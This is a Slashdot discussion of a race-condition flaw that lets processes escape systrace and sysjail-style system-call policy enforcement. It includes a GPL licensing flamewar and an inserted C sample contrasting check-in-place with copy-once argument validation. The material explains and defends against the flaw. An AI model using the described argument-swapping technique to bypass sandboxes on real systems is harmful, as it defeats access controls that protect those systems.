      He also doesn't get upset about problems being found in software, like any sane person, he's more afraid of the problems he's not finding out about.

    2. Re:Brace for impact... by arehnius · · Score: 1
      Correct me if I'm wrong, but Robert Watson is a kind of security guru for FreeBSD, isn't he ? From his page :

      Robert Watson (FreeBSD Home Page) : I'm a FreeBSD Core Team member, as well as member of the security officer and release engineering teams. I hope nobody will take it as a plot of FreeBSD to gain/keep lead over other BSDs.
    3. Re:Brace for impact... by mulvane · · Score: 1

      The BSD's work pretty closely together and if he did find something in another BSD, it could be very possible he was looking into a feature to port over and doing his own testing of the code before hand found this. Is this what happened? I am not sure, but it is possible. The BSD's are really in a non-compete status with each other and are more in a sharing of knowledge of the forks of the original base.

    4. Re:Brace for impact... by Anonymous Coward · · Score: 0

      He also doesn't get upset about problems being found in software

      Michael Buesch would beg to differ.

      like any sane person, he's more afraid of the problems he's not finding out about.

      Two problems with this: you're making the assumption that Theo is sane, and that being upset about one thing precludes the possibility of being upset about something else.

    5. Re:Brace for impact... by Anonymous Coward · · Score: 1, Informative

      Michael Buesch is a sodding douche who jumped the gun and instead of actually talking to people started screaming bloody murder, and Theo was not upset about the problem in the code so much as Michael Buesch being said douche. Read the threads, it's almost entirely based on Theo saying, "you didn't have to be a fucking asshole about it."

    6. Re:Brace for impact... by peacefinder · · Score: 1

      Robert Watson is apparently the fellow who suggested porting systrace to FreeBSD. Seems like he's been working on this for a long time.

      "I hope nobody will take it as a plot of FreeBSD to gain/keep lead over other BSDs."

      I shouldn't think so. At least for sysjail, this problem affects "All versions [...] on all architectures." It doesn't seem to be an OpenBSD-specific problem, but with many implementations of systrace(4). If FreeBSD has already fixed their systrace, then presumably the other BSDs will be looking to them for some ideas on fixing the issue.

      Although, pinning it to OpenBSD in the headline was good for both demonstrating the seriousness of the issue and for generating more pageviews. :-)

      --
      With reasonable men I will reason; with humane men I will plead; but to tyrants I will give no quarter. -- William Lloyd
    7. Re:Brace for impact... by Anonymous Coward · · Score: 0

      Yes, because stealing someone else's source code is somehow a "mistake" and not "being an asshole." Theo was just trying to take the sting out of the fact that code was stolen. That would be like me stealing your car, giving it back, and then calling you an asshole for being such a jerk and calling the cops. Fuck that. When you're wrong, you're wrong. Code was stolen, and Theo defends the guy like it's his son or boyfriend. Get over it, accept that your "boy" did wrong, and move the fuck on.

      And seriously, Theo telling someone not to be an asshole? Even if we ignore the theft, that's the kettle filing an affirmative action suit against the pot.

      BT has BB

    8. Re:Brace for impact... by Anonymous Coward · · Score: 0

      Before posting, please learn the English language if that is the one you're going to post in.

      Stealing requires that the act deprive the rightful owner of the property access to it.

      Copying something, especially a digital work, does not deprive the rightful owner access, it increases the number of properties which exist. This deprives the creator of the initial work potential gain from their control of the work.

      That is what is called copyright violation, unless the terms under which a work is released permits duplication.

      What happened with the bcw driver was not stealing, nor copyright violation, it was breach of contract.

      The terms under which the code which you think was stolen were broken, the terms being those of the GPLv2.

      It was incorrect of the developer to upload code drawn straight from a GPLv2 source, without including that licence, true, but it was a simple mistake that is easily done and has been done before in the past. In fact, when many companies have taken GPLv2 code and used it in binaries without releasing the source at all, they've been warned that that was a breach of terms, and asked to correct it. It's done quietly, politely, as if between two rational parties.

      That was not what was done in the case of the bcw driver's violation, straight off the mark an OpenBSD developer was called a thief and was persecuted, not even an iota of benefit of the doubt, straight to an attack on the person on a personal and professional level.

      You are a seriously deluded little fuck with a chip on his shoulder, and a grudge against de Raadt, that's a shame. I know if I made a mistake I'd want my supervisor to defend me and say, "hey, the kid fucked up, back off and cut him some slack."

      After all, the code which was copied was only in CVS for a short time, it was never released as an actual work, it also was never even functional. De Raadt stated this, and it is true, it's very simple and people like you refuse to let it seep in to those brick-heads of yours.

      Who better to recognise an asshole than an asshole, asshole.

    9. Re:Brace for impact... by 808140 · · Score: 1

      I agree that it wasn't stealing -- but it was indeed a copyright violation. Ignoring all the hoopla that followed for a moment, we have a situation where a developer uploaded a bunch of GPLd source, did not indicate that it was GPLd source, and, here's the important part, made it publicly available via CVS.

      There are two things to consider here, both of which are important. First, from the perspective of a BSD developer: with no indication that the code was GPLd code, and given that it was on a public OpenBSD CVS server, it would be reasonable to assume that it was available under the BSD license. Of course, in reality, it wasn't, it was available only under the terms of the GPL, which as you know, applies equally to derivative works. So said BSD developer, unaware of the situation, might have taken GPLd code and incorporated it innocently into his own, BSD-licensed code, believing that he was using BSD code.

      Think about this for a second: you're writing some code for a small project without source control. You find some useful BSD-licensed code on the internet and gleefully incorporate some of the routines into your program. Development continues. Then, later, it comes out that the code you incorporated was not BSD-licensed, it was GPL. Oops -- now you're fucked, because unless you can remember exactly what you added, you may be forced by the GPL to distribute the whole package under the terms of the GPL. In this way, Theo and co may very well have fucked quite a number of BSD developers. There's no way of knowing -- it was an open CVS server, after all, who knows how many people took code and what they did with it? Given that it was a driver, perhaps there weren't that many, but the point is, we'll never know. This, by itself, should demonstrate to you how ill-advised the whole thing was.

      But wait, there's more. Theo indicated in the thread that there was no intention to distribute any of that code, and that it would all be replaced. All well and good -- until you consider that piece-wise replacement of GPLd code probably constitutes a derivative work -- to be safe, the general legal consensus is that a clean-room reimplementation is the only way to ensure that you aren't just creating a derivative. Remember, the GPL is a "viral" license. The only way you're allowed to use it is if you agree to provide all derivative works under the GPL as well. That would mean that by using GPLd code, even if they replaced every line in every file, they would still be forced to release their code under the GPL.

      Listen, I've been using OpenBSD since the 2.x days, and I really like the product (I always buy the CDs, I have the stickers plastered all over my firewall, etc). I know that Theo's abrasive personality often has people saying that he's wrong when he's not, just because they don't like his delivery. And normally, I'm one of the first to defend him. But in this particular instance, what they were doing wasn't right, it could have harmed BSD developers, and creating a driver using a GPLd skeleton, whether it was ever functional or not, would have resulted in a work that by law would have been GPLd -- releasing it under the BSD would have been a copyright violation.

      Those are the facts. Unfortunately.

    10. Re:Brace for impact... by Anonymous Coward · · Score: 0

      You find some useful BSD-licensed code on the internet and gleefully incorporate some of the routines into your program. Development continues. Then, later, it comes out that the code you incorporated was not BSD-licensed, it was GPL. Oops -- now you're fucked, because unless you can remember exactly what you added, you may be forced by the GPL to distribute the whole package under the terms of the GPL

      That's purely hypothetical. In this specific case there was no chance of that happening. The code was specific to a driver (non functioning at that). Who the hell is going to incorporate bits of that into their own project?

      The reality is that someone forgot to include a license. And the original developer acted like a total asshole.

    11. Re:Brace for impact... by Anonymous Coward · · Score: 0

      Indeed, who the fuck incorporates non-working drivers into their projects? Nobody but the people developing them. MB was a dickhead and couldn't even for a second behave rationally, his douchebaggery in handling a simple situation that could have easily been corrected in minutes, became a five day fiasco because he didn't have the decency to treat another human with any kind of respect.

    12. Re:Brace for impact... by 808140 · · Score: 1

      That's purely hypothetical. In this specific case there was no chance of that happening. The code was specific to a driver (non functioning at that). Who the hell is going to incorporate bits of that into their own project?

      This is kind of like fucking a girl who talks like a virgin without wearing a condom and saying there's no chance you'll get an STD from her. Sure, she looks clean, but how can you really know? You're taking a risk. It may be a calculated risk, but it is a risk nonetheless.

      The original developer may or may not have acted like a total asshole -- everyone in the BSD camp says he was, and everyone in the GNU camp says Theo was being a dick. Listen, I don't care either way. Among hackers, delivery isn't what's important, what's important is being right. This is why Theo and Linus both routinely flame the shit out of people who don't know what's up and are still respected.

      Here's the deal: if MB had quietly contacted Theo and co as the latter group would have liked, instead of making a big deal about it on a public mailing list, no one not part of the inner circle would have known about it. This is all well and good if what you care about is saving face, but it sucks dick if you're a BSD developer who took some of that code and now has no idea he's infringing. By putting GPL licensed code on an open server, they made this possible. Because a big deal was made about it, anyone likely to have downloaded code from there now knows that the code he took was GPLd and not BSDd as was implied.

      I know, I know, you're saying that odds are, no one took any code and incorporated it into projects, that all the CVS check outs of the code were made by people who were interested in the driver and nothing else. But here's the deal: all of those people checking out that code were barebacking a girl with an STD, to use my colorful analogy. The STD was the GPL. Maybe they caught it, maybe they didn't -- but they had a right to know. Wanting to cover it up is like being too embarrassed to tell your boyfriend that you got the clap that night you went out to the bar without him. Who wouldn't be? But what's the right thing to do in this situation? Tell him to get himself checked, or risk his health by pretending you're still a daisy-fresh girl?

  16. The beauty of fanboys by Anonymous Coward · · Score: 0

    Mmmm.... fanboys.

    I want to lick them all over.

  17. fix schedules ? by Anonymous Coward · · Score: 0

    anyone know how or when these things are supposed to be fixed ?

    as usual I would assume *bsd to put out fixes quite timely...

    1. Re:fix schedules ? by orclevegam · · Score: 3, Informative

      as usual I would assume *bsd to put out fixes quite timely...

      Well, the fix for now appears to be don't use the vulnerable software, but considering that the vulnerability allows you to break the software such that it behaves as if it wasn't running, I have to wonder if people should use it anyway and just accept that for now anyone that knows how can bypass that particular security check. Also, if it was something simple like a buffer overrun that would be trivial to patch, but because of the way this particular vulnerability functions (concurrency attack) there's no simple solution. Some have suggested pushing the code to kernel space, but as they've also pointed out, that's rather risky in its own regard. Short of some kind of provision in the kernel to prevent the attacks I'm not sure how this could be fixed (although I haven't seen too many details, just that it involves re-writing some args after they've already been scanned by systrace).

      --
      Curiosity was framed, Ignorance killed the cat.
    2. Re:fix schedules ? by TubeSteak · · Score: 3, Informative

      as usual I would assume *bsd to put out fixes quite timely...

      FTFA: All affected vendors received at least six months, and in some cases many years advance notice regarding these vulnerabilities.
      --
      [Fuck Beta]
      o0t!
    3. Re:fix schedules ? by peacefinder · · Score: 1

      "I have to wonder if people should use it anyway and just accept that for now anyone that knows how can bypass that particular security check"

      It'll be interesting to see what the tradeoff is: does the system become more vulnerable overall by using the vulnerable software, or less? Has the layer of security it was supposed to add become another exploit path that's worse than what it was supposed to protect against?

      My off-the-cuff inexpert guess is that it will still be valuable for some limited situations, but that in many cases it'll reduce the overall security of the system. I'm looking forward to hearing more from the various teams involved.

      --
      With reasonable men I will reason; with humane men I will plead; but to tyrants I will give no quarter. -- William Lloyd
    4. Re:fix schedules ? by orclevegam · · Score: 1

      My off-the-cuff inexpert guess is that it will still be valuable for some limited situations, but that in many cases it'll reduce the overall security of the system. I'm looking forward to hearing more from the various teams involved.

      Well, if I'm understanding the exploit properly, and the purpose of systrace, I can see both for and against. It's essentially there to allow an application to run at least privileges unless it wants to access a specific resource, and then to only be promoted for the duration of that request. The alternative to this is to run an application with elevated (normal in the case of most applications, few require root) privileges all the time. Now, depending on how the privilege escalation is implemented, this is either harmless, or very dangerous. If they promote to a level required to access a resource based on the initially granted status, this isn't bad as the program would only have permissions to access what it normally would be allowed to anyway, you just get less warning because you won't get a popup if it tries to access something it still has permission to, but which is unexpected based on its access policy. If on the other hand, it's promoted to maximum privilege whenever the request is approved this is very dangerous because it could for instance request permission to modify some innocuous file, then change it after the fact to modify /etc/passwd.

      --
      Curiosity was framed, Ignorance killed the cat.
  18. "cambrige researcher"... by diegocgteleline.es · · Score: 3, Informative

    ...and he's also one of the most important FreeBSD hackers.

    1. Re:"cambrige researcher"... by chrisgagne · · Score: 1, Flamebait

      He's probably one of the *only* FreeBSD hackers.

    2. Re:"cambrige researcher"... by Anonymous Coward · · Score: 0

      Excuse me, but I think teh linux is calling you...

  19. Re:Linux? by Noryungi · · Score: 2, Informative

    Yes, M. Watson also attacked equivalent programs (GSWTK) under Linux successfully.

    Read his blog post, as some of the techniques described are quite interesting. Too bad we can't read the full paper.

    --
    The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
  20. Article? by Leafheart · · Score: 1

    Site is slashdotted, anyone got a copy of the article?

    --
    --- "When you gotta do something wrong. You gotta do it right. (Fighter)"
    1. Re:Article? by Anonymous Coward · · Score: 1, Interesting

      By the way, what has happened to the slashdot effect? Not so long ago the first thing I did when reading about something on slashdot was finding a coral or google cache link to the actual article on the comments section. Nowadays - and I haven't really even thought about it - the articles usually just work. Are the webservers better now, or has the power of slashdot effect declined?

      Or have I just been lucky?

    2. Re:Article? by Anonymous Coward · · Score: 1, Funny

      Are the webservers better now, or has the power of slashdot effect declined? Or have I just been lucky?

      Yes.

    3. Re:Article? by jjrockman · · Score: 3, Funny

      Nah, it's just that nobody RTFA anymore.

      --
      Quit jabbering on the phone while driving. You are not that important.
    4. Re:Article? by RockoTDF · · Score: 1

      No, the power of the digg effect has gone up.

      --
      There is more to science than physics!

      www.iomalfunction.blogspot.com
    5. Re:Article? by iknowcss · · Score: 1

      What do you mean by "anymore."

      --
      Life is rarely fair. Cherish the moments when there is a right answer.
    6. Re:Article? by cp.tar · · Score: 1

      By the way, what has happened to the slashdot effect? Not so long ago the first thing I did when reading about something on slashdot was finding a coral or google cache link to the actual article on the comments section. Nowadays - and I haven't really even thought about it - the articles usually just work. Are the webservers better now, or has the power of slashdot effect declined?

      Or have I just been lucky?

      It is now known as the Slashdot Quantum Paradox.

      Previously, the Slashdot Paradox meant that although nobody ever read TFA, the servers were still swarmed and brought down to their knees by the sheer force of discussion.

      Nowadays, due to several breakthroughs in quantum science and technology, the Slashdot Quantum Paradox ensures that as long as nobody actually goes to RTFA, the servers stay online. However, should anybody actually go and try to RTFA, the Slashdot Effect would affect it in full.

      Since you are an Anonymous Coward, you're practically nobody; you went to RTFA and the server was, of course, online.

      See?

      --
      Ignore this signature. By order.
  21. Re:Why??? by orclevegam · · Score: 4, Interesting

    Why is everyone so hell bent on BREAKING things? Can't we all just try to get along for an instant?

    Because the fastest way to learn about something is to break it. Why do you think physicists spend all that time and money on particle accelerators?

    --
    Curiosity was framed, Ignorance killed the cat.
  22. MOD PARENT DOWN!! by Anonymous Coward · · Score: 0, Offtopic

    This is frickin' stupid. Nice try at ripping off the CARRIER LOST template, but you should at least copy and paste it if you don't understand where it came from.

  23. Re:Linux? by x_MeRLiN_x · · Score: 4, Informative

    Would you be talking about this?

  24. problem affects a variety of software by Anonymous Coward · · Score: 1, Informative

    This class of problem potentially affects a variety of software. Systrace (which runs on Linux, NetBSD, OpenBSD, Darwin, etc) was given as one example of software that is affected. Even Sun's Dtrace might be vulnerable.

    1. Re:problem affects a variety of software by Anonymous Coward · · Score: 0

      No, DTrace is most certainly *not* vulnerable. See:
      http://www.opensolaris.org/jive/thread.jspa?threadID=36929&tstart=0 ...for why this is.

  25. Re:Why??? by ettlz · · Score: 1
    Clarification:

    Why do you think physicists spend all that time and *other people's* money on particle accelerators?

    ;) (Well, I'm a theorist, so make of it what you will...)
  26. Re:Well by Anonymous Coward · · Score: 0

    In other news, nobody but middle managers cares what Netcraft has to say about OS usage.

  27. This is exactly why I love OpenBSD! by amper · · Score: 4, Insightful

    The very fact that the OpenBSD project makes itself such a huge target for would-be hackers is what makes it almost certain that any vulnerabilities will be found and patched. No handwringing is necessary here, though quite a lot of recoding may be involved. We can all look forward to an even more secure OpenBSD very soon. Keep up the good work, everyone!

    1. Re:This is exactly why I love OpenBSD! by DrSkwid · · Score: 1

      Nah, OS X exploits are where the kudos is at. You don't get death threats from Theo

      --
      There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
    2. Re:This is exactly why I love OpenBSD! by Anonymous Coward · · Score: 0

      Well considering they have known about these holes for years I'm not that impressed.

      There should have already been a fix in there a long time ago.

  28. OF - Hey, I know what's supposed to be behind this.. by Anonymous Coward · · Score: 0

    I know what's supposed to be behind this roof!

    It's a view of my City!

    I'm not kidding, picture taken from http://en.wikipedia.org/wiki/Chillon looking at my City http://en.wikipedia.org/wiki/Montreux

    It's freakin' Swiss Day on slashdot or what ? next article is going to be about a red cross on a white flag... oh wait

  29. USENIX Workshop On Offensive Technology by Moniker42 · · Score: 0

    USENIX Workshop On Offensive Technology spells umm... woot?

    *checks the date*

    well, it's not April 1st ;)

  30. So they can break someone *else's*! by Anonymous Coward · · Score: 0
  31. Re:The beauty of open source by Anonymous Coward · · Score: 0

    I thought the beauty of open source was that the code was constantly reviewed by a million eyes so that bugs like this would either never occur or would be discovered quickly (rather than years after the fact). I guess that was complete bullshit.

  32. Am I missing something? by Ancient_Hacker · · Score: 0, Redundant
    Am I missing something?

    Isn't it well known that you should not validate some data that the user might still be able to modify? That's security 101.

    What's the problem with copying parameters to some memory space that the user can't reach, like the system heap? Surely moving a few bytes isn't going to be a big performance hit, compared to the time it takes to validate parameters.

  33. Re:Linux? by Noryungi · · Score: 0

    Correct. I only found the link after surfing to his web site.

    --
    The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
  34. OpenBSD's man page for systrace mentions this? by cgdae · · Score: 5, Informative

    OpenBSD's systrace manpage appears to mention this problem in the BUGS section:

    Applications that use clone()-like system calls to share the complete address space between processes may be able to replace system call arguments after they have been evaluated by systrace and escape policy enforcement.

    Or see http://www.openbsd.org/cgi-bin/man.cgi?query=systrace&apropos=0&sektion=0&manpath=OpenBSD+Current&arch=i386&format=html

    --
    http://op59.net/
    1. Re:OpenBSD's man page for systrace mentions this? by Anonymous Coward · · Score: 1, Informative

      That note is in the man page because Robert Watson pointed out the bug several years ago -- however, the note is incorrect. It asserts that threading (clone) is required, but part of the point of the paper is that you don't even need threading to exploit this. The issue here is not that there can't be workarounds, but that to fix the fundamental issue here, the way system calls handle arguments has to be fundamentally changed: the system has to become message-passing.

    2. Re:OpenBSD's man page for systrace mentions this? by widman · · Score: 1

      All the Linux fan-boy trolling posts get high scores, this guy only 1?

  35. m0n0wall /pfsense? by atarione · · Score: 1

    hey could someone do me a favor and tell me if m0n0wall or Pfsense ... are vulnerable to this?

    --
    actually I am happy to see you, however that is in fact a banana in my pocket.
    1. Re:m0n0wall /pfsense? by Anonymous Coward · · Score: 0

      What the hell else are you running on a monowall/pfsense machine that is systrace'd?

  36. Re:Linux? by Hawke · · Score: 3, Interesting

    The presentation covers it pretty well. At least the GSWTK attack.

    (It's a straightforward time-of-use vs. time-of-check attack. And we were at least partially aware of it when we wrote GSWTK. The problem is that the original system calls require memory in the process's space, so you can't just copy in the string after you validate it to keep the process from changing it. I wrote some methods for Linux that allocated extra pages in the process's memory space so we could copy in the string, but that just makes the attack harder via obscurity. It doesn't address the fundamental issue at all.)

  37. Re:Why??? by snoyberg · · Score: 1

    Because the fastest way to learn about something is to break it. Why do you think physicists spend all that time and money on particle accelerators?

    For a second on reading that, I saw "psychologists" instead of "physicists." Gave a very different meaning...

    --
    Thank God for evolution.
  38. Re:Why??? by orclevegam · · Score: 1

    For a second on reading that, I saw "psychologists" instead of "physicists." Gave a very different meaning...

    I see, very interesting... and what does this inkblot look like to you?

    --
    Curiosity was framed, Ignorance killed the cat.
  39. The quick explanation by Anonymous Coward · · Score: 1, Informative

    This is actually a long-known kernel problem, namely that once you have threads, you can't rely on user buffers to remain constant. So you MUST copy the buffers into kernel space ONCE, and validate and trust only the copy.

    If you validate and trust the user buffer, a second thread sharing the same address space can change the buffer between the two steps, leading to trusting invalid data, which leads to Bad Things.

    But some applications are trying to "wrap" system calls, validating the parameters before letting the system call proceed, and they're running into the same problems. It's more of a challenge for a wrapper, because there's no "safe" place to copy the parameters to.

    In any case, this is not a kernel vulnerability, but an overoptimistic application vulnerability.

    1. Re:The quick explanation by Anonymous Coward · · Score: 0

      This doesn't require threads, just shared memory. You don't even need to use explicit shared memory (like shmem or mmap) constructs, you could just do it with /proc if you wanted to. I suspect a debugger would also make this sort of attack easy.

      dom
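
The "copy the buffers once, validate and trust only the copy" rule from comment 39, and the "can't just copy in the string after you validate it" problem from the GSWTK comment (36), modelled in C as an added example; this is not code from the paper, from Systrace, GSWTK or any other project discussed here. The policy (only paths under /tmp/), the path strings, the function names and the sched_point_fn hook that stands in for "another process gets to run here" are all constructed for illustration. The first wrapper validates the shared buffer and then lets the call read it again; the second snapshots it into private memory before checking, so whatever happens to the shared buffer afterwards cannot change what was validated.

```c
#include <stdio.h>
#include <string.h>

#define ARG_MAX_LEN 64

/* Constructed sample: memory shared between the confined process and a
 * cooperating process (for example via fork() with shared mappings). */
static char shared_arg[ARG_MAX_LEN] = "/tmp/allowed.txt";

void reset_shared_arg(void)
{
    strcpy(shared_arg, "/tmp/allowed.txt");
}

/* Constructed policy: only paths under /tmp/ may be passed to the call. */
static int policy_allows(const char *path)
{
    return strncmp(path, "/tmp/", 5) == 0;
}

/* Hypothetical scheduling point: models the other process running
 * between the wrapper's check and the kernel's use of the argument. */
typedef void (*sched_point_fn)(void);

/* Constructed cooperating process: rewrites the shared argument. */
void cooperating_process_writes(void)
{
    strcpy(shared_arg, "/var/private/data");
}

/* Bounded strlen; returns ARG_MAX_LEN when no terminator was found. */
static size_t bounded_len(const char *s)
{
    size_t n = 0;
    while (n < ARG_MAX_LEN && s[n] != '\0')
        n++;
    return n;
}

/* Weak pattern: check the buffer in place, then fetch it a second time.
 * 'out' receives the path the underlying call would actually act on.
 * Returns 0 if the call proceeds, -1 if the wrapper denies it. */
int wrapper_check_user_buffer(const char *user_arg, sched_point_fn between,
                              char *out, size_t outlen)
{
    if (!policy_allows(user_arg))
        return -1;
    if (between)
        between();                  /* other process may run here */
    snprintf(out, outlen, "%s", user_arg);   /* second fetch from shared memory */
    return 0;
}

/* Hardened pattern: copy once into private memory, validate the copy,
 * and hand only the copy on. The scheduling point no longer matters. */
int wrapper_copy_once(const char *user_arg, sched_point_fn between,
                      char *out, size_t outlen)
{
    char priv[ARG_MAX_LEN];
    size_t n = bounded_len(user_arg);
    if (n == ARG_MAX_LEN)
        return -1;                  /* unterminated or oversized argument */
    memcpy(priv, user_arg, n + 1);  /* single snapshot, terminator included */
    if (!policy_allows(priv))
        return -1;
    if (between)
        between();                  /* shared buffer may change; priv does not */
    snprintf(out, outlen, "%s", priv);
    return 0;
}

int main(void)
{
    char out[ARG_MAX_LEN];

    reset_shared_arg();
    if (wrapper_check_user_buffer(shared_arg, cooperating_process_writes,
                                  out, sizeof out) == 0)
        printf("check-in-place wrapper let the call act on: %s\n", out);

    reset_shared_arg();
    if (wrapper_copy_once(shared_arg, cooperating_process_writes,
                          out, sizeof out) == 0)
        printf("copy-once wrapper let the call act on:      %s\n", out);
    return 0;
}
```

The point the comments make is visible in where `priv` lives: the hardened wrapper only works because it owns memory the confined process cannot reach, which a kernel has and a userland wrapper operating on the process's own pages does not.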

  40. But if sudo isn't secure... by Gazzonyx · · Score: 1

    So... how do you patch your system without escalating from a normal user?

    --

    If I mod you up, it doesn't necessarily mean I agree with what you've said, sorry.

  41. Re:So much for security by Anonymous Coward · · Score: 0

    Hey, asshat! In case you missed it, the vulnerability affects Windows anti-virus products, too.

  42. OpenBSD record: Good by widman · · Score: 2, Insightful
    The only meaningful bug they had lately was the IPV6 mbuf. And even that one obviously affected only people using IPv6.

    This race bug was known for ages. It's even hinted in the man page. Stop the FUD.

    1. Re:OpenBSD record: Good by Anonymous Coward · · Score: 0

      Fact: OpenBSD is dying.

      Nuff said.

  43. Attn: slashdot editors by Anonymous Coward · · Score: 1, Insightful

    It would be nice if the parent comment (or a link to it) was placed in the article summary. The sudo application and the above comment dismissing concern over current releases is probably important enough to warrant this.

    Thanks :)
    umeboshi (not logged in)

  44. Sysjail is really just one guy by raddan · · Score: 2, Informative

    Kristaps Dzonsons. And I'm not sure if he ever really intended for it to be for production use. I saw his talk at NYCBSDCon last year, and my impression was "here's a neat tool I'm working on guys, I'm still working out a lot of things, come play if you want". Not that this isn't an important vulnerability to address-- but I'd be surprised if anyone was currently using sysjail in an important production role.

  45. Lights out, Pard by Anonymous Coward · · Score: 0

    Somewhere in a lonely hospital room, *BSD is dying.

    "BSD? It's dead, Jim . . . "

  46. Hahaha! by Anonymous Coward · · Score: 0

    Sweet justice! My Win98 boxes have finally protected me against a hole. I am invinci*^&#%
    $#%#^&&!#$@$

    [CONNNECTION LOST]

  47. Don't use dev tools as security tools... by Anti-Trend · · Score: 1

    ...that's essentially what the presenter is saying. The 'chroot' style jail is essentially a fake system root designed for development purposes, so you can have a little fake clean-room environment in which to build. Later, this concept was adapted for security purposes -- hence systrace, sysjail... What he's suggesting is that this userland approach is easily circumvented, and the best approach would be to use a mandatory access control approach at the kernel level, ala SELinux. To me, it's not so much that these programs are vulnerable as they are ineffective as security tools. I'm glad this is getting some publicity and opening a few eyes. Not to say that SELinux is the do-all end-all be-all of security, rather that false security is sometimes worse than no security.

    --
    Working in a DevOps shop is like playing in a band made up entirely of keytarists.
  48. Undeadly coverage by zyche · · Score: 4, Informative

    Coverage on Undeadly.

    To answer some anti-OpenBSD bias from the summary above: systrace is really Niels Provos' toy, OpenBSD just includes it in the base install just as NetBSD does; regarding sudo, it has been addressed in a comment above (not vulnerable in the actual released version); and by saying that NetBSD has disabled systrace that implies that OpenBSD has it still enabled. Except that it is a tool that isn't used by the default install at all - you have to enable and configure it yourself. And as the Undeadly post states: Since 2002, the systrace(1) man page included a warning in the BUGS section about the possibility of escaping the policy enforcement because of the behavior of certain system calls.

    Personally I have never liked the idea of systrace - leaves way too much to me as a system administrator to fuck up.

    1. Re:Undeadly coverage by widman · · Score: 1
      I still think systrace is a lot better than nothing. It has minimal performance impact and you can have basic blocks for applications running foreign code (like browsers and mail clients.)

      Sure, it's not perfect. I knew that from day 1.

    2. Re:Undeadly coverage by datastew · · Score: 1

      Mods- This is the comment I was looking for and I had to get through half of the comments to find it. Please mod up as I am sure others are interested in the actual OpenBSD response.

  49. Rumours of *BSD Death Premature by itsybitsy · · Score: 1

    Hi,

    The rumours of the death of *BSD systems are overblown and premature. The so called facts from the above "anonymous coward" are not facts at all but simply an opinion expressed by someone with an agenda.

    If you don't use *BSD why would you care if it's living or dying? Why would you care if it's increasing in market share or declining?

    The "anonymous cowards" opinions are irrelevant and likely incorrect anyhow. OpenBSD, NetBSD and FreeBSD are viable systems that have user communities that use them. It's not relevant how large those communities are.

    In fact the so called Linux community isn't one community after all since there are reportedly over 300 distributions of systems that use the Linux kernel. So it's really *Linux and each of those distributions would break down to similar small groupings of users.

    If your system works for you use it. If it doesn't, then adapt it or choose one that is better suited.

    1. Re:Rumours of *BSD Death Premature by Slashcrap · · Score: 1

      The rumours of the death of *BSD systems are overblown and premature. The so called facts from the above "anonymous coward" are not facts at all but simply an opinion expressed by someone with an agenda.

      When I see a BSD user being so defensive in response to one of the World's oldest and most obvious trolls, I can only draw one conclusion - BSD must be dying.

    2. Re:Rumours of *BSD Death Premature by itsybitsy · · Score: 1

      When I see a BSD user being so defensive in response to one of the World's oldest and most obvious trolls, I can only draw one conclusion - BSD must be dying.

      And when I see comments such as yours it's obvious that you are the troll. However, even trolls need to be dealt with by a little thing known as a dose of reality.

      The only way for *BSD to die is for all its users to stop using it. That goes for Linux too, or Windows for that matter.

      Death of software isn't the same as death of people since when a person dies it's game over for that person - eternal nothingness - non-existence brought to you.

      When software dies that means that every copy has been destroyed or rendered unusable.

      It's rare for a piece of software to actually die, especially one that is as widely distributed as *BSD. *BSD will live longer than you or your spawn (and their spawn) if you are lucky enough to have any.

      All that's premature are your comments. Live long and prosper with whatever system(s) you are using. Oh, yeah, by limiting your system choices you are supporting a homogeneous mono culture and contributing to blandness which can only lead to Idiocracy. With your support we can make the Idiocracy happen much sooner.

      Expand your view across the wider horizon that is out there for you to take advantage of: *BSD, Minix 3.x, EROS, MenuetOS, and of course there are these others listed here: http://en.wikipedia.org/wiki/List_of_operating_systems.

      Then of course there is MacOSX which is a *BSD system with more users than all Linux installations combined; but then we wouldn't want facts to get in the way of your trolling now would we.

      So using your logic, since MacOSX has more users than Linux, Linux must be dying. That's just flawed thinking buddy - get a brain and learn critical thinking skills.

  50. How vulnerable are Java apps, and why? by Anonymous Coward · · Score: 0

    I posted a blog entry about how this applies in Java, with source code, examples of exploits, and an explanation of how Java generally avoids this problem, and another idea of how it could be avoided outside of Java.

    1. Re:How vulnerable are Java apps, and why? by Ash-Fox · · Score: 1

      Let me know when Java applications under the Sun JRE will run as responsive as C, Delphi, C++ applications do or better on the current people's commodity hardware -- WinXP + 256MB RAM + Resource intensive anti-virus software.

      And before anyone mentions, no, I'm not interested on benchmarks done on multicore, 12GB RAM machines.

      --
      Change is certain; progress is not obligatory.
    2. Re:How vulnerable are Java apps, and why? by Anonymous Coward · · Score: 0

      You just said it yourself: resource-intensive anti-virus software. Java is an alternative to that because the JVM's security architecture has anti-virus capabilities built-in, without needing to be resource-intensive. The anti-virus software that everyone runs these days has a major impact on performance, and it's trying to do the same thing Java does with its sandbox architecture. The difference is that anti-virus software is not nearly as protective as the JVM is, and compiled executable + anti-virus is a lot slower than a Java app.

      And by the way, I do most of my work in a 100% Java GUI (Swing) app, which is NetBeans, a large, complicated, powerful IDE, on a regular PC, and it is just as responsive as any other desktop app, and it uses less memory. It runs in less than 100mb, all the time.

    3. Re:How vulnerable are Java apps, and why? by Ash-Fox · · Score: 1

      You just said it yourself: resource-intensive anti-virus software. Java is an alternative to that because the JVM's security architecture has anti-virus capabilities built-in, without needing to be resource-intensive.

      One could write a virus in Java too.

      The anti-virus software that everyone runs these days has a major impact on performance

      Not quite, but certain very common anti-virus software is quite intensive.

      and it's trying to do the same thing Java does with its sandbox architecture.

      Most resident scanners scan for patterns against their virus databases in active memory. It's rare that heuristic scanning picks up unique viruses.

      The difference is that anti-virus software is not nearly as protective as the JVM is

      The anti-virus scanner can block known viruses. The Sun JVM doesn't have such functionality. In theory Java is great, because the user gets a dialog on applets/webstart applications to run the application. However, there have been many certificate vulnerabilities with the JVM, there have been vulnerabilities related to executing unsigned java code by the use of certain java bytecode etc.

      and compiled executable + anti-virus is a lot slower than a Java app.

      Well, this isn't a direct comparison since the code in both of these programs is substantially different but, just looking at some well known programs like utorrent + anti-virus versus Sun JVM + Azureus, kdevelop (the recent kde related port) versus Sun JVM + netbeans etc. I find the java applications slower responding.

      In what cases can I see it's slower? I can see the UIs redrawing, I can see the mouse clicks aren't being handled instantly, I can see the application just freezes somewhat unlike my other applications.

      That said, I have seen benchmarks that show reads and writes are faster in Java compared to a C application, but in reality, that's just a small thing for me.

